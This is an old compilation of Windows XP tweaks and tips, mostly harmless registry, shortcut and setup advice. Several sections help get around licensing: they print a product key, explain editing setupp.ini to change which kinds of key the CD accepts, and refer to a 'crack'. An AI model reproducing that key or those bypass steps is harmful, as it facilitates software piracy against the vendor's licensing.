Here’s how to check if your copy of XP is Activated Go to the run box and type in oobe/msoobe /a and hit ok …theirs your answer Windows Explorer Tip When launched in Windows Millennium/Win2k/WinXP,Explorer by default will open the “My Documents” folder. Many people prefer the behavior from previous versions of Windows, where Windows Explorer would open and display “My Computer” instead of the new way. To revert to the old way [My Computer by default rather than My Documents as the default], simply edit the shortcut to Windows Explorer, by right clicking on it, and left clicking “Properties” and changing the “Target” box to: “C:\WINDOWS\EXPLORER.EXE /n,/e,” [adjust the path/drive letter if needed]. The key is to add the “/n,/e,” to the end of the shortcut (don’t type the quotes). Backup your Fresh install After you complete your clean install and get all your software installed I would recommend that you use something like Drive Image 3 or 4 to do an image of your install partition, then burn the image to CD and keep it. XP is a different creature for some people. If you mess it up when playing around with it, just bring the image back. You can be up and running again in 20 minutes vs. the two to three hours it will take to get the whole thing and all your stuff installed again. Note the default install of XP is about 1.5gigs and the DI image may be larger that 700 meg. So don’t install too much on the OS partition. To help downsize the Image I run the System file checker and reset the cache size to 40 or 50 meg (It’s well over 300 by default). To run it open the command prop and type: SFC /? SFC /purgecache SFC /cachesize=50 and finally rebuild the cache with SFC /scannow (have the CD ready) I also Delete the Pagefile.sys and hibernate.sys files before running Drive Image.. Section 2 By Ankit 1.When setting up the system with tweaks or making changes to the core OS or hardware always be logged in as administrator. Seems that while XP does create an account upon install that has administrator privileges, its not the same as the administrator account is. Think about it this way – if the account created was the same then why have an administrator account period? 2.It is always better to install winXP clean than to do an upgrade. 3. The files and settings wizard is your friend. However it doesn’t save the account passwords for your e-mail and news groups accounts in OE. Export these accounts manually from within OE first before hand and save them in a safe place. This way you will not need to remember what the account info was, just import the account again. 4. If using a SB Live sound card and trying to run Unreal (the game) you may have some problems. This is not the fault of winXP or Unreal. the problem is a bad driver design from creative and the Devloader portion. There is currently no work around for this problem. 5. Many – many games do run in winXP with comparability mode. The easiest way to do this is to simply create a shortcut on the desktop to the game executable and choose the compatibility tab of the shortcut and set up for win98. 6. Do not disable all the services that you find outlined in the win2K tweak guides floating around. Instead set them to manual instead of disabled. This will allow something to start up when it is needed and you’ll avoid the BSOD thing that can occur if something gets disabled that wasn’t supposed to. 7. The winXP firewall is actually very good. However it is not very configurable. I would recommend tiny personal firewall from www.tinysoftware.com. It free and all you need. It so far is the most compatible with winXP – why you may ask? – because (little known trivia fun fact here) this is where the winXP firewall came from. Both the XP built in firewall and tiny will give complete stealth. However what you can do – which is kind of cool is divide the work between the two and use both. use tiny to just filter the ports you want to filter instead of everything and let the built in XP firewall take care of the rest. The result is a smoother running firewall system that reacts much more quickly. I’ve used Nortons , zone alarm (which contrary to popular belief is not a real firewall and a joke in the IT community as a whole) and several of the rest, Tiny has been the best so far. 8. After you complete your clean install and get all your software installed I would recommend that you use something like drive image 4 to do an image of your install partition, then burn the image to CD and keep it. XP is a different creature for some people. If you mess it up when playing around with it, just bring the image back. You can be up and running again in 20 minutes vs. the two to three hours it will take to get the whole thing and all your stuff installed again. 9. choose winXP pro over the personal version because it has more bells and whistles. However if the bells and whistles do not appeal to you then the home (personal) version is the way to go. 10. Avoid problems with WinXP. Insure that your hardware is on the HCL. Don’t be mad because the latest and greatest doesn’t work with your hardware. It is not the fault of MS , winXP or anything or one else. Not defending them here, just being practical. Look at it this way – if your dream car costs $100,000 dollars and you don’t have $100,000 is it the car manufactures fault? nope because thats the free enterprise system and the way it works. Try to upgrade your hardware if you can. If you can’t, wait for drivers from the manufacturer that support winxp. I would highly recommend before installing winXP that you go out and get the win2000 drivers for all your hardware. 99% of the win2000 drivers will work in winXP. This way if winxp doesn’t have drivers, you do. XP will ship with out the Virtual Java Machine. It will not appear on windows update either. Some sites will prompt you to install it upon visit to their sites. However this might change in the near future due to the problem between SUN and MS so the link you get pointed to might no be there. You can get the virtual Java machine now and have it ready to use when you install XP. go to: and download the VJM for winNT. If you try to d/l the one for win2000 (which is exactly the same as the one for NT) you will be told to get the service pack. You don’t want to do this for XP. or download it from: keep it in a safe place and use it when you install XP. XP browsing speed up tweak when you connect to a web site your computer sends information back and forth, this is obvious. Some of this information deals with resolving the site name to an IP address, the stuff that tcp/ip really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although WinXP and win2000 has a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below: ************begin copy and paste*********** Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters] “CacheHashTableBucketSize”=dword:00000001 “CacheHashTableSize”=dword:00000180 “MaxCacheEntryTtlLimit”=dword:0000fa00 “MaxSOACacheEntryTtlLimit”=dword:0000012d ************end copy and paste*********** make a new text file and rename it to dnscache.reg. The copy and paste the above into it and save it. Then merge it into the registry. Grouping multiple open windows WinXP will group multiple open windows (IE windows for example) into one group on the task bar to keep the desktop clear. This can be annoying at times – especially when comparing different web pages because you have to go back to the task bar, click on the group and then click on the page you want and then you only get one page because you have to click on each one separately. I think the default for this is 8 windows – any combination of apps or utilities open. You can modify this behavior by adding this reg key at: Change number of windows that are open before XP will start grouping them on the Taskbar HKEY_CURRRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ add reg_Dword “TaskbarGroupSize” modify “TaskbarGroupSize” entry to be the number of windows you want open before XP starts to group them on the task bar. A value of 2 will cause the Taskbar buttons to always group Another tweak is to disable or enable recent documents history. This can be done at: HKEY_CURRRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ this key should already be present – if it isn’t you’ll need to add it: reg_Binary “NoRecentDocsHistory” modify it so that value reads 01 00 00 00 Wanna network but don’t have all the stuff? If you want to network two winXP machines together you don’t have to install a full blown network setup, i.e…switches, hubs, routers, etc… All you need is two NIC cards (three if you want to share an Internet connection) and a cross over cable. 1. Connect one NIC to your broadband connection device like normal. 2. Install a second NIC in the machine with the broadband connection. 3. install a NIC in the second machine. 4. connect the cross over cable between the second machine NIC and the second NIC in the board band connection machine. 5. re-boot both. 6. Run the networking wizard if necessary. or: use a direct connection setup with a parallel port to parallel port connection to the two machines. You will not be able to share a connection with the direct connect. Help is just a directory away! – Tip In windows XP pro at C:\Windows\help – you will find many *.chm files. These are the help files. Just start one up and find what your looking for without going thru the main help menu. If for example you are interested in command line tools or command line references start up the ntcmds.chm file. If you use command line a lot for things just create a shortcut on your desktop to this file and it there when you need it. You could go thru the Help thing to find these but on the home version some are not linked in some of the help. This is shorter. Speed things up a bit tip this might help some of you. 1. go to control panel – system. 2. click on the advanced tab 3. under “performance” click on the settings button 4. click on the Advanced tab 5. click on the “Background Services” button 6. Click OK Section 3 Windows XP Tips ‘n’ Tricks ========================== Please note that some of these tips require you to use a Registry Editor (regedit.exe), which could render your system unusable. Thus, none of these tips are supported in any way: Use them at your own risk. Also note that most of these tips will require you to be logged on with Administrative rights. Unlocking WinXP’s setupp.ini ============================ WinXP’s setupp.ini controls how the CD acts. IE is it an OEM version or retail? First, find your setupp.ini file in the i386 directory on your WinXP CD. Open it up, it’ll look something like this: ExtraData=707A667567736F696F697911AE7E05 Pid=55034000 The Pid value is what we’re interested in. What’s there now looks like a standard default. There are special numbers that determine if it’s a retail, oem, or volume license edition. First, we break down that number into two parts. The first five digits determines how the CD will behave, ie is it a retail CD that lets you clean install or upgrade, or an oem CD that only lets you perform a clean install? The last three digits determines what CD key it will accept. You are able to mix and match these values. For example you could make a WinXP CD that acted like a retail CD, yet accepted OEM keys. Now, for the actual values. Remember the first and last values are interchangeable, but usually you’d keep them as a pair: Retail = 51882 335 Volume License = 51883 270 OEM = 82503 OEM So if you wanted a retail CD that took retail keys, the last line of your setupp.ini file would read: Pid=51882335 And if you wanted a retail CD that took OEM keys, you’d use: Pid=51882OEM How do I get the “Administrator” name on Welcome Screen? ======================================================= To get Admin account on the “Welcome Screen” as well as the other usernames, make sure that there are no accounts logged in. Press “ctrl-alt-del” twice and you should be able to login as administrator! finally worked for me after I found out that all accounts have to be logged out first Fix Movie Interference in AVI files ================================== If you have any AVI files that you saved in Windows 9x, which have interference when opened in Windows XP, there is an easy fix to get rid of the interference: Open Windows Movie Maker. Click View and then click Options. Click in the box to remove the check mark beside Automatically create clips. Now, import the movie file that has interference and drag it onto the timeline. Then save the movie, and during the re rendering, the interference will be removed. Create a Password Reset Disk ============================ If you?re running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk to log onto your computer when you forget your password. To create the disk: Click Start, click Control Panel, and then click User Accounts. Click your account name. Under Related Tasks, click Prevent a forgotten password. Follow the directions in the Forgotten Password Wizard to create a password reset disk. Store the disk in a secure location, because anyone using it can access your local user account Change Web Page Font Size on the Fly ==================================== If your mouse contains a wheel for scrolling, you can change font size on the fly when viewing a Web page. To do so: Press and hold Ctrl. Scroll down (or towards yourself) to enlarge the font size. Scroll up (or away from yourself) to reduce the font size. You might find it useful to reduce font size when printing a Web page, so that you can fit more content on the page. WinXP Clear Page file on shutdown ================================= WINXPCPS.REG (WinXP Clear Page file on shutdown) This Registration (.REG) file clears the Page file when you power off the computer. Restart Windows for these changes to take effect! ALWAYS BACKUP YOUR SYSTEM BEFORE MAKING ANY CHANGES! Browse to: HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ Memory Management and add the DWORD variable “ClearPageFileAtShutdown”=dword:00000001 You can also do this without reg hacking. Go to Control panel Administrative tools, local security policy. then go to local policies —> security options. Then change the option for “Shutdown: Clear Virtual Memory Pagefile” Group Policy for Windows XP =========================== One of the most full featured Windows XP configuration tools available is hidden right there in your system, but most people don’t even know it exists. It’s called the Local Group Policy Editor, or gpedit for short. To invoke this editor, select Start and then Run, then type the following: gpedit.msc After you hit ENTER, you’ll be greeted by gpedit, which lets you modify virtually every feature in Windows XP without having to resort to regedit. Dig around and enjoy! Forgetting What Your Files Are? =============================== This procedure works under NTFS. As times goes along you have a lot files on your computer. You are going to forget what they are. Well here is way to identify them as you scroll through Windows Explorer in the future. This procedure works under NTFS. 1.. Open up a folder on your system that you want to keep track of the different files you might one to identify in the future. 2.. Under View make certain that you set it to the Details. 3.. Highlight the file you want to keep more information on. Right click the file and you will get a pop up menu. Click on properties. 4.. Click on the Summary Tab (make sure it says simple not advanced on the button in the box), You should now get the following fields, Title,Subject, Author, Category, Keywords, Comments You will see advanced also if you have changed it to simple, Here will be other fields you can fill in. 5.. Next you can fill in what ever field you want. 6.. After you finished click the apply button then OK. 7.. Next right click the bar above your files, under the address bar and you should get a drop down menu. Here you can click the fields you want to display. 8.. You should now see a list with the new fields and any comments you have done. 9.. Now if you want to sort these just right click a blank spot and then you sort the information to your liking. Temporarily Assign Yourself Administrative Permissions ====================================================== Many programs require you to have Administrative permissions to be able to install them. Here is an easy way to temporarily assign yourself Administrative permissions while you remain logged in as a normal user. Hold down the Shift key as you right-click on the program?s setup file. Click Run as. Type in a username and password that have Administrative permissions. This will also work on applications in the Start menu. Create a Shortcut to Lock Your Computer ======================================= Leaving your computer in a hurry but you don?t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it “Lock Workstation” or choose any name you like. Click Finish. You can also change the shortcut’s icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient. Create a Shortcut to Start Remote Desktop ========================================= Tip: You can add a shortcut to the desktop of your home computer to quickly start Remote Desktop and connect to your office computer. To create a shortcut icon to start Remote Desktop Click Start, point to More Programs, point to Accessories, point to Communications, and then click on Remote Desktop Connection. Click Options. Configure settings for the connection to your office computer. Click Save As, and enter a name, such as Office Computer. Click Save. Open the Remote Desktops folder. Right-click on the file named Office Computer, and then click Create Shortcut. Drag the shortcut onto the desktop of your home computer. To start Remote Desktop and connect to your office computer, double-click on the shortcut Instantly Activate a Screen saver ================================ Turn on a screen saver without having to wait by adding a shortcut to your desktop: Click the Start button, and then click Search. In the Search Companion window, click All file types. In the file name box, type *.scr In the Look in box, choose Local Hard Drives (C or the drive where you have system files stored on your computer. Click Search. You will see a list of screen savers in the results. Pick a screen saver you want. You can preview it by double-clicking it. Right click on the file, choose Send To, and then click Desktop (create shortcut). To activate the screen saver, double-click the icon on your desktop Add a Map Drive Button to the Toolbar ===================================== Do you want to quickly map a drive, but can?t find the toolbar button? If you map drives often, use one of these options to add a Map Drive button to the folder toolbar. Option One (Long Term Fix) Click Start, click My Computer, right-click the toolbar, then unlock the toolbars, if necessary. Right-click the toolbar again, and then click Customize. Under Available toolbar buttons, locate Map Drive, and drag it into the position you want on the right under Current toolbar buttons. Click Close, click OK, and then click OK again. You now have drive mapping buttons on your toolbar, so you can map drives from any folder window. To unmap drives, follow the above procedure, selecting Disconnect under Available toolbar buttons. To quickly map a drive, try this option. Option Two (Quick Fix) Click Start, and right-click My Computer. Click Map Network Drive. If you place your My Computer icon directly on the desktop, you can make this move in only two clicks! Software not installing? ======================== If you have a piece of software that refuses to install because it says that you are not running Windows 2000 (such as the Win2K drivers for a Mustek scanner!!) you can simply edit HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/ProductName to say Microsoft Windows 2000 instead of XP and it will install. You may also have to edit the version number or build number, depending on how hard the program tries to verify that you are installing on the correct OS. I had to do this for my Mustek 600 CP scanner (compatibility mode didn’t’ help!!!) and it worked great, so I now have my scanner working with XP (and a tech at Mustek can now eat his words). BTW, don’t’ forget to restore any changes you make after you get your software installed You do this at your own risk. Use your Windows Key ==================== The Windows logo key, located in the bottom row of most computer keyboards is a little-used treasure. Don’t’ ignore it. It is the shortcut anchor for the following commands: Windows: Display the Start menu Windows + D: Minimize or restore all windows Windows + E: Display Windows Explorer Windows + F: Display Search for files Windows + Ctrl + F: Display Search for computer Windows + F1: Display Help and Support Center Windows + R: Display Run dialog box Windows + break: Display System Properties dialog box Windows + shift + M: Undo minimize all windows Windows + L: Lock the workstation Windows + U: Open Utility Manager Windows + Q: Quick switching of users (Powertoys only) Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your PC Change your CD key ================== You don’t need to re-install if you want to try the key out … just do this: 1. Go to Activate Windows 2. Select the Telephone option 3. Click “Change Product Key” 4. Enter RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ 5. Click “Update” Now log off and log back in again. It should now show 60 days left, minus the number of days it had already counted down. Note: If your crack de-activated REGWIZC.DLL and LICDLL.DLL, you are going to have to re-register them. Remove the Shared Documents folders from My Computer ==================================================== One of the most annoying things about the new Windows XP user interface is that Microsoft saw fit to provide links to all of the Shared Documents folders on your system, right at the top of the My Computer window. I can’t imagine why this would be the default, even in a shared PC environment at home, but what’s even more annoying is that you cannot change this behavior through the sh*ll : Those icons are stuck there and you have to live with it. Until now, that is. Simply fire up the Registry Editor and navigate to the following key: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You’ll see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this, all of the Shared Documents folders (which are normally under the group called “Other Files Stored on This Computer” will be gone. You do not need to reboot your system to see the change. Before: A cluttered mess with icons no one will ever use (especially that orphaned one). After: Simplicity itself, and the way it should be by default. This tip For older XP builds =================== Edit or remove the “Comments” link in window title bars During the Windows XP beta, Microsoft has added a “Comments?” hyperlink to the title bar of each window in the system so that beta testers can more easily send in a problem report about the user interface. But for most of us, this isn’t an issue, and the Comments link is simply a visual distraction. And for many programs that alter the title bar, the Comments link renders the Minimize, Maximize, and Close window buttons unusable, so it’s actually a problem. Let’s get rid of it. Or, if you’re into this kind of thing, you can edit it too. Open the Registry Editor and navigate to the following keys: My Computer \ HKEY_CURRENT_USER \ Control Panel \ Desktop \ LameButtonEnabled My Computer \ HKEY_CURRENT_USER \ Control Panel \ Desktop \ LameButtonText The first key determines whether the link appears at all; change its value to 0 to turn it off. The second key lets you have a little fun with the hyperlink; you can change the text to anything you’d like, such as “Paul Thurrott” or whatever. Editing either value requires a restart before the changes take effect. Before: An unnecessary hyperlink. Have some fun with it! Or just remove it entirely. It’s up to you. Rip high-quality MP3s in Windows Media Player 8 ================================================ The relationship between Windows Media Player 8 and the MP3 audio format is widely misunderstood. Basically, WMP8 will be able to playback MP3 files, but encoding (or “ripping” CD audio into MP3 format will require an MP3 plug-in. So during the Windows XP beta, Microsoft is supplying a sample MP3 plug-in for testing purposes, but it’s limited to 56 Kbps rips, which is pretty useless. However, if you have an externally installed MP3 codec, you can use WMP8 to rip at higher bit rates. But you’ll have to edit the Registry to make this work. Fire up the Registry Editor and navigate to the following key: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ MediaPlayer \ Settings \ MP3Encoding Here, you’ll see sub-keys for LowRate and LowRateSample, which of course equates to the single 56 Kbps sample rate you see in WMP8. To get better sampling rates, try adding the following keys (Using New then DWORD value): “LowRate” = DWORD value of 0000dac0 “MediumRate” = DWORD value of 0000fa00 “MediumHighRate” = DWORD value of 0001f400 “HighRate” = DWORD value of 0002ee00 Now, when you launch WMP8 and go into Tools, then Options, then Copy Music, you will have four encoding choices for MP3: 56 Kbps, 64 Kbps, 128 Kbps, and 192 Kbps. Note that you will not get higher bit rate encoding unless you have installed an MP3 codec separately; the version in Windows Media Player 8 is limited to 56 Kbps only. Find the appropriate location in the Registry… …add a few DWORD values… …And then you’ll be ripping CDs in higher-quality MP3 format! Speed up the Start Menu ======================= The default speed of the Start Menu is pretty slow, but you can fix that by editing a Registry Key. Fire up the Registry Editor and navigate to the following key: HKEY_CURRENT_USER \ Control Panel \ Desktop \ MenuShowDelay By default, the value is 400. Change this to a smaller value, such as 0, to speed it up. Speed up the Start Menu (Part two) ================================== If your confounded by the slow speed of the Start Menu, even after using the tip above, then you might try the following: Navigate to Display Properties then Appearance then Advanced and turn off the option titled Show menu shadow . You will get much better overall performance. Speed up Internet Explorer 6 Favorites ====================================== For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes–I’ve noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here’s a fix for the problem that does work, though it’s unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works. Do an unattended installation ============================= The Windows XP Setup routine is much nicer than that in Windows 2000 or Windows Me, but it’s still an hour-long process that forces you to sit in front of your computer for an hour, answering dialog boxes and typing in product keys. But Windows XP picks up one of the more useful features from Windows 2000, the ability to do an unattended installation, so you can simply prepare a script that will answer all those dialogs for you and let you spend some quality time with your family. I’ve written about Windows 2000 unattended installations and the process is pretty much identical on Windows XP, so please read that article carefully before proceeding. And you need to be aware that this feature is designed for a standalone Windows XP system: If you want to dual-boot Windows XP with another OS, you’re going to have to go through the interactive Setup just like everyone else: An unattended install will wipe out your hard drive and install only Windows XP, usually. To perform an unattended installation, you just need to work with the Setup Manager, which is located on the Windows XP CD-ROM in D:\SupportTools\DEPLOY.CAB by default: Extract the contents of this file and you’ll find a number of useful tools and help files; the one we’re interested in is named setupmgr.exe. This is a very simple wizard application that will walk you through the process of creating an answer file called winnt.sif that can be used to guide Windows XP Setup through the unattended installation. One final tip: There’s one thing that Setup Manager doesn’t add: Your product key. However, you can add this to the unattend.txt file manually. Simply open the file in Notepad and add the following line under the [UserData] section: ProductID=RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ (This is a 60 day CD key) Then, just copy winnt.sif to a floppy, put your Windows XP CD-ROM in the CD drive, and reboot: When the CD auto-boots, it will look for the unattend.txt file in A: automatically, and use it to answer the Setup questions if it’s there. Finally, please remember that this will wipe out your system! Back up first, and spend some time with the help files in DEPLOY.CAB before proceeding. For Older builds or not using setupreg.hiv file =============================================== Remove the Desktop version text During the Windows XP beta, you will see text in the lower right corner of the screen that says Windows XP Professional, Evaluation Copy. Build 2462 or similar. A lot of people would like to remove this text for some reason, and while it’s possible to do so, the cure is more damaging than the problem, in my opinion. So the following step will remove this text, but you’ll lose a lot of the nice graphical effects that come in Windows XP, such as the see-through icon text. To remove the desktop version text, open Display Properties (right-click the desktop, then choose Properties) and navigate to the Desktop page. Click Customize Desktop and then choose the Web page in the resulting dialog. On this page, check the option titled Lock desktop items. Click OK to close the dialog, and then OK to close Display Properties. The text disappears. But now the rest of your system is really ugly. You can reverse the process by unchecking Lock desktop items. There’s also a shortcut for this process: Just right-click the desktop and choose Arrange by then Lock Web Icons on the Desktop. ——————————————————————————– Enable ClearType on the Welcome Screen! ======================================= As laptop users and other LCD owners are quickly realizing, Microsoft’s ClearType technology in Windows XP really makes a big difference for readability. But the this feature is enabled on a per-user basis in Windows XP, so you can’t see the effect on the Welcome screen; it only appears after you logon. But you can fix that. Fire up the Registry Editor and look for the following keys: (default user) HKEY_USERS \ .Default \ Control Panel \ Desktop \ FontSmoothing (String Value) HKEY_USERS \ .Default \ Control Panel \ Desktop \ FontSmoothingType (Hexadecimal DWORD Value) Make sure both of these values are set to 2 and you’ll have ClearType enabled on the Welcome screen and on each new user by default. Stop Windows Messenger from Auto-Starting ========================================= If you’re not a big fan of Windows Messenger simply delete the following Registry Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS Display Hibernate Option on the Shut Down dialog ================================================ For some reason, Hibernate may not be available from the default Shut Down dialog. But you can enable it simply enough, by holding down the SHIFT key while the dialog is visible. Now you see it, now you don’t! Add album art to any music folder ================================= One of the coolest new features in Windows XP is its album thumbnail generator, which automatically places the appropriate album cover art on the folder to which you are copying music (generally in WMA format). But what about those people that have already copied their CDs to the hard drive using MP3 format? You can download album cover art from sites such as cdnow.com or amguide.com, and then use the new Windows XP folder customize feature to display the proper image for each folder. But this takes time–you have to manually edit the folder properties for every single folder–and you will lose customizations if you have to reinstall the OS. There’s an excellent fix, however. When you download the album cover art from the Web, just save the images as folder.jpg each time and place them in the appropriate folder. Then, Windows XP will automatically use that image as the thumbnail for that folder and, best of all, will use that image in Windows Media Player for Windows XP (MPXP) if you choose to display album cover art instead of a visualization. And the folder customization is automatic, so it survives an OS reinstallation as well. Your music folders never looked so good! Album cover art makes music folder thumbnails look better than ever! Change the location of the My Music or My Pictures folders ====================================================== In Windows 2000, Microsoft added the ability to right-click the My Documents folder and choose a new location for that folder in the shell . With Windows XP, Microsoft has elevated the My Music and My Pictures folders to the same “special shell folder” status of My Documents, but they never added a similar (and simple) method for changing those folder’s locations. However, it is actually pretty easy to change the location of these folders, using the following method. Open a My Computer window and navigate to the location where you’d like My Music (or My Pictures) to reside. Then, open the My Documents folder in a different window. Drag the My Music (or My Pictures) folder to the other window, and Windows XP will update all of the references to that folder to the new location, including the Start menu. Or use Tweak UI Add/Remove optional features of Windows XP ========================================== To dramatically expand the list of applications you can remove from Windows XP after installation, navigate to C:\WINDOWS\inf (substituting the correct drive letter for your version of Windows) and open the sysoc.inf file. Under Windows XP Professional Edition RC1, this file will resemble the following by default: [Version] Signature = “$Windows NT$” DriverVer=06/26/2001,5.1.2505.0 [Components] NtComponents=ntoc.dll,NtOcSetupProc,,4 WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7 Display=desk.cpl,DisplayOcSetupProc,,7 Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7 NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7 iis=iis.dll,OcEntry,iis.inf,,7 com=comsetup.dll,OcEntry,comnt5.inf,hide,7 dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7 IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7 TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2 msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6 ims=imsinsnt.dll,OcEntry,ims.inf,,7 fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7 AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7 msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 msnexplr=ocmsn.dll,OcEntry,msnmsn.inf,,7 smarttgs=ocgen.dll,OcEntry,msnsl.inf,,7 RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7 Games=ocgen.dll,OcEntry,games.inf,,7 AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7 CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7 MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7 AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7 Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7 MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7 ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7 [Global] WindowTitle=%WindowTitle% WindowTitle.StandAlone=”*” The entries that include the text hide or HIDE will not show up in Add/Remove Windows Components by default. To fix this, do a global search and replace for ,hide and change each instance of this to , (a comma). Then, save the file, relaunch Add/Remove Windows Components, and tweak the installed applications to your heart’s content. Cool, eh? There are even more new options now under “Accessories and Utilities” too. Remove Windows Messenger ======================== It seems that a lot of people are interested in removing Windows Messenger for some reason, though I strongly recommend against this: In Windows XP, Windows Messenger will be the hub of your connection to the .NET world, and now that this feature is part of Windows, I think we’re going to see a lot of .NET Passport-enabled Web sites appearing as well. But if you can’t stand the little app, there are a couple of ways to get rid of it, and ensure that it doesn’t pop up every time you boot into XP. The best way simply utilizes the previous tip: If you’d like Windows Messenger to show up in the list of programs you can add and remove from Windows, navigate to C:\WINDOWS\inf (substituting the correct drive letter for your version of Windows) and open sysoc.inf (see the previous tip for more information about this file). You’ll see a line that reads: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 Change this to the following and Windows Messenger will appear in Add or Remove Programs, then Add/Remove Windows Components, then , and you can remove it for good: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7 Autolog On tip for XP real easy and straight forward. 1. click on “Start” – then click on “Run” – type “control userpasswords2″ 2. click OK 3. On the Users tab, clear the “Users must enter a user name and password to use this computer” check box. 4. A dialog will appear that asks you what user name and password should be used to logon automatically. Your all set. Aspi WinXP does not come with an Aspi layer. So far almost 90% of the problems with winXP and CD burning software are Aspi layer problems. After installing winXP, before installing any CD burning software do a few things first: 1. Open up “My computer” and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called “Recording”. On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. Thats is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released. Print Dir XP alas does not include a way to print a directory listing aside from using the command prompt. I talking about a right click on the directory and print the files names on the printer type of Dir print. So I guess we will need to add one – start up regedit and add the following [HKEY_CLASSES_ROOT\Folder\shell\print\command] @=”command.com /c dir %1 > PRN” [HKEY_CLASSES_ROOT\Folder\shell\print\command] @=”command.com /c dir %1 > dirprnt.txt” Right click on a folder in windows explorer and choose “print”. The contents of the folder will appear in a file called dirprnt.txt in the folder. open the file and print it out. If you want to print directly to the printer remove the second line containing “dirprnt.txt” Rename Multiple files A new, small, neat feature for winXP deals with renaming files. I personally have always wanted the OS to include a way to do a mass file renaming on a bunch of files. You can now rename multiple files at once in WinXP. Its real simple: 1. Select several files in Explorer, press F2 and rename one of those files to something else. All the selected files get renamed to the new file name (plus a number added to the end). 2. thats it. Simple huh. I would recommend that you only have the files you want to rename in the directory your working in. I would also recommend that until you get used to this neat little trick that you save copies of the files in a safe location while your getting the hang of it. Handy for renaming those mass amounts of porn pics you d/l from the web Use Window Blinds XP to add themes Windows Blinds XP has been integrated into the Windows XP operating system. Microsoft and Stardock have entered into a partnership in which Microsoft will use their technology in the Windows XP operating system. With Windows Blinds XP installed you have additional styles to choose from in display properties. And the best part is you can download over 1000 different styles and even make your own very easily with the SDK. To get started you need to download the Windows Blinds XP extension: www.stardock.com/files/wbxp-b5_private.exe to download the latest beta Note: You must register at http://scripting.stardock.com/customer/wbxp_beta.asp to be able to legally download the Windows Blinds XP beta. Once you register they will even e-mail you when new builds are available for download. Once downloaded, install the program and you will notice the extra styles in the display properties when you run the program. To download more styles www.wincustomize.com/index.asp and select windows blinds on the menu on the left. Show file extensions Ever wonder where you file extensions went? Working with files when you can not tell what the file extension can be a huge pain in the butt. Thankfully, MS has made it possible for all file names with the extensions to be shown. In any folder that contains files. Click on the tools menu and select folder options. Then click on the view tab. Locate where it lists Hide extensions of known file types and uncheck it. Click OK. XP memory tweaks Below are some Windows XP memory tweaks. They are located in the windows registry at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management DisablePagingExecutive – When enabled, this setting will prevent the paging of the Win2k Executive files to the hard drive, causing the OS and most programs to be more responsive. However, it is advised that people should only perform this tweak if they have a significant amount of RAM on their system (more than 128 MB), because this setting does use a substantial portion of your system resources. By default, the value of this key is 0. To enable it, set it to 1. LargeSystemCache – When enabled (the default on Server versions of Windows 2000), this setting tells the OS to devote all but 4 MB of system memory (which is left for disk caching) to the file system cache. The main effect of this is allowing the computer to cache the OS Kernel to memory, making the OS more responsive. The setting is dynamic and if more than 4 MB is needed from the disk cache for some reason, the space will be released to it. By default, 8MB is earmarked for this purpose. This tweak usually makes the OS more responsive. It is a dynamic setting, and the kernel will give up any space deemed necessary for another application (at a performance hit when such changes are needed). As with the previous 